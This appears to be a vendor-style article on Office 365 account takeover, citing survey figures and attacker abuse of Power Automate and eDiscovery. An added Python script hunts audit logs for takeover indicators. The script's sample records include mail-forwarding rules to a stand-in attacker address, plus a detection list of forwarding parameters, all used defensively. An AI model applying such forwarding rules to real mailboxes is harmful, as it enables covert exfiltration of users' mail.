The rapid adoption of cloud over the past year hasn’t just enabled businesses to continue operating seamlessly during a global crisis; it has also raised concerns about cybersecurity and about securing remote work environments. Cloud and digital transformation still present transitional gaps, and adversaries benefit from the speed and scale of adoption. With many organisations increasing their cloud software usage, Microsoft has dominated the productivity space with 115 million daily active users.
However, a new global study by Vectra AI has revealed that 71% of Microsoft Office 365 deployments suffered an average of seven malicious account takeovers in the 12 months to February 2021. The fact that more than seven in ten companies have experienced malicious account takeover attacks highlights the need to track and secure identities as they move from on-prem to the cloud. The confidence displayed by security decision-makers in their ability to prevent account takeover attacks is a stark contrast to the rising number of attacks and long dwell times.
With the new work-from-home paradigm, the proliferation of data-driven applications, and the advancement of technologies such as artificial intelligence (AI) and the Internet of Things (IoT) in the enterprise, cybercriminals too are using more advanced tools and sophisticated methods to attack organisations and breach privacy. User account takeover in Office 365 is the most effective way for an attacker to move laterally inside an organisation’s network: once an attacker holds a valid identity, the traffic looks like any other user’s and the built-in tools are available to them. Cybercriminals rarely act alone; they share infrastructure and often belong to entire syndicates dedicated to sabotage, which forces organisations to constantly review and renew their security policies.
Bridging the Knowledge Gap
In this landscape, enterprises are coming to realise that cyber threat defence and mitigation against increasingly sophisticated attacks are beyond the scope of a single cybersecurity team. Constantly evolving threats mean a round-the-clock effort and highly specialised skills are needed to bolster enterprise cybersecurity, particularly within a hybrid cloud environment.
The survey also revealed that 80% of Singapore respondents and 96% of Australia and New Zealand respondents indicated their organisation’s cybersecurity risk had increased in the 12 months to February 2021. As a result of increased Microsoft Office 365 usage during COVID-19, their main security concern is now the risk of data being compromised and the ability of attackers to hide their tracks by using legitimate Microsoft tools, such as Power Automate (to automate exfiltration or persistence from inside a compromised account) and eDiscovery (to search mailboxes and sites without touching them directly). At a time when remote working is here for the long term, the attack surface (such as personal devices) and the threat landscape (new vulnerabilities) are both getting wider, so building a security-minded culture becomes a collective responsibility.
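The abuse path described above, a taken-over account turning legitimate Office 365 features against the tenant, is exactly what the detection effort in the tips below has to find. As an added example (my own illustration, not code from the Vectra report or from Microsoft), the script below scans Office 365 Unified Audit Log records, one JSON object per line as you would get from `Search-UnifiedAuditLog`'s `AuditData` field, and flags the post-takeover steps the article names: Power Automate flow creation and eDiscovery search creation or export shortly after a login from an IP the user has never used, plus mailbox forwarding rules regardless of timing. All records, user names, IPs and the "known IPs" baseline are constructed sample data; the operation and field names follow the audit schema as I know it, so confirm them against an export from your own tenant before relying on them.

```python
"""Hunt for post-account-takeover activity in Office 365 audit records.

Added example, not from the original article. SAMPLE_LOG and KNOWN_IPS
are constructed; operation/field names follow the Unified Audit Log
schema as documented by Microsoft (verify against your tenant).
"""
import json
from datetime import datetime, timedelta

# Operations worth a second look when they follow a login from an unseen IP.
CONTEXTUAL_OPS = {
    "CreateFlow": "Power Automate flow created",
    "SearchCreated": "eDiscovery content search created",
    "SearchExported": "eDiscovery search results exported",
}
# Exchange cmdlets that are flagged whenever they carry forwarding/delete
# parameters, because external forwarding is rarely legitimate at all.
EXCHANGE_OPS = {"New-InboxRule": "inbox rule created",
                "Set-Mailbox": "mailbox settings changed"}
FORWARDING_PARAMS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                     "DeleteMessage", "ForwardingSmtpAddress", "ForwardingAddress"}
WINDOW = timedelta(hours=6)   # assumption: tune to your tenant

# Constructed baseline: IPs each user logged in from over the prior 30 days.
KNOWN_IPS = {
    "alice@example.com": {"203.0.113.7"},
    "bob@example.com": {"203.0.113.7"},
    "carol@example.com": {"203.0.113.9"},
}

# Constructed sample records (one JSON object per line).
SAMPLE_LOG = """
{"CreationDate": "2021-02-01T08:00:00", "UserId": "alice@example.com", "Operation": "UserLoggedIn", "Workload": "AzureActiveDirectory", "ClientIP": "203.0.113.7"}
{"CreationDate": "2021-02-01T08:30:00", "UserId": "alice@example.com", "Operation": "CreateFlow", "Workload": "MicrosoftFlow", "ClientIP": "203.0.113.7"}
{"CreationDate": "2021-02-01T09:00:00", "UserId": "bob@example.com", "Operation": "UserLoggedIn", "Workload": "AzureActiveDirectory", "ClientIP": "198.51.100.23"}
{"CreationDate": "2021-02-01T09:05:00", "UserId": "bob@example.com", "Operation": "New-InboxRule", "Workload": "Exchange", "ClientIP": "198.51.100.23", "Parameters": [{"Name": "Name", "Value": "."}, {"Name": "ForwardTo", "Value": "drop@attacker.example"}, {"Name": "DeleteMessage", "Value": "True"}]}
{"CreationDate": "2021-02-01T09:20:00", "UserId": "bob@example.com", "Operation": "CreateFlow", "Workload": "MicrosoftFlow", "ClientIP": "198.51.100.23"}
{"CreationDate": "2021-02-01T10:00:00", "UserId": "bob@example.com", "Operation": "SearchCreated", "Workload": "SecurityComplianceCenter", "ClientIP": "198.51.100.23"}
{"CreationDate": "2021-02-01T11:00:00", "UserId": "carol@example.com", "Operation": "UserLoggedIn", "Workload": "AzureActiveDirectory", "ClientIP": "192.0.2.44"}
{"CreationDate": "2021-02-01T18:30:00", "UserId": "carol@example.com", "Operation": "Set-Mailbox", "Workload": "Exchange", "ClientIP": "192.0.2.44", "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:drop@attacker.example"}]}
"""


def parse_records(text):
    """Parse newline-delimited JSON audit records, sorted by CreationDate."""
    recs = [json.loads(line) for line in text.strip().splitlines() if line.strip()]
    for r in recs:
        r["_ts"] = datetime.strptime(r["CreationDate"], "%Y-%m-%dT%H:%M:%S")
    return sorted(recs, key=lambda r: r["_ts"])


def _param_names(rec):
    return {p["Name"] for p in rec.get("Parameters", [])}


def flag_ato_indicators(records, known_ips, window=WINDOW):
    """Return a list of findings, each a dict with user/time/operation/reason."""
    findings = []
    new_ip_login = {}   # user -> time of latest login from an IP not in baseline
    for r in records:
        user, op = r["UserId"], r["Operation"]
        if op == "UserLoggedIn":
            if r.get("ClientIP") not in known_ips.get(user, set()):
                new_ip_login[user] = r["_ts"]
            continue
        forwarding = _param_names(r) & FORWARDING_PARAMS
        recent = user in new_ip_login and r["_ts"] - new_ip_login[user] <= window
        if op in EXCHANGE_OPS and forwarding:
            reason = f"{EXCHANGE_OPS[op]} with {sorted(forwarding)}"
        elif op in CONTEXTUAL_OPS and recent:
            reason = (f"{CONTEXTUAL_OPS[op]} within {window} of a login "
                      f"from unseen IP {r.get('ClientIP')}")
        else:
            continue
        findings.append({"user": user, "time": r["CreationDate"],
                         "operation": op, "ip": r.get("ClientIP"), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in flag_ato_indicators(parse_records(SAMPLE_LOG), KNOWN_IPS):
        print(f"{f['time']} {f['user']:<20} {f['operation']:<14} {f['reason']}")
```

On the sample data this reports bob's forwarding rule, flow creation and eDiscovery search (all within six hours of his login from 198.51.100.23) and carol's external forwarding, while alice's flow creation from her usual address is left alone. The time window is only a noise reducer for the contextual operations; forwarding to an external address is treated as worth triage on its own, which is why carol is flagged even though her mailbox change falls outside the window.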
To better protect an organisation from insider and external threats, I’d like to share some best practice tips:
1. Apply a mix of subject matter experts and technology
It’s not enough to invest in tools alone; organisations also need to build knowledge and establish stringent governance frameworks. That’s where vendors with true cybersecurity expertise drive value, helping organisations not only to draw upon expertise and intelligent, AI-driven detection tools but also to gain deep visibility into security and compliance gaps.
2. Understand your threat landscape
It is imperative that organisations truly understand their new enterprise network. We have seen the network perimeter vanish during 2020 as organisations have shifted to the cloud; the modern enterprise network is now datacentre, IaaS, SaaS and PaaS together. The enterprise must have visibility into all of these environments and be able to track attackers as they pivot between them, which means building detection and response capabilities that cover every one of them and follow attacker behaviour as it moves laterally.
3. Prioritise and respond at speed and scale
It is critical that enterprises can not only identify attackers as they pivot through the modern network, but also respond rapidly and in a consistent way across every network stack, be that IaaS, SaaS, PaaS or datacentre. The way to achieve this with a finite team is to prioritise incidents using AI and automation, so that the limited capacity of the SOC has the best chance of driving down metrics such as mean time to remediation, reducing the impact of attackers and the risk of a widespread breach.
Building a secure organisation for the future
With a scarcity of talent, many organisations struggle with experience shortfalls in their cybersecurity team. Entities need to focus on their networks and maintain good cyber hygiene to drive down the noise coming into security operations centres. Unless security investments are made in response capabilities, the gap between attacker and responder will continue to grow. How quickly and effectively an entity identifies an attack and responds to a breach will determine who succeeds in this fast-changing time.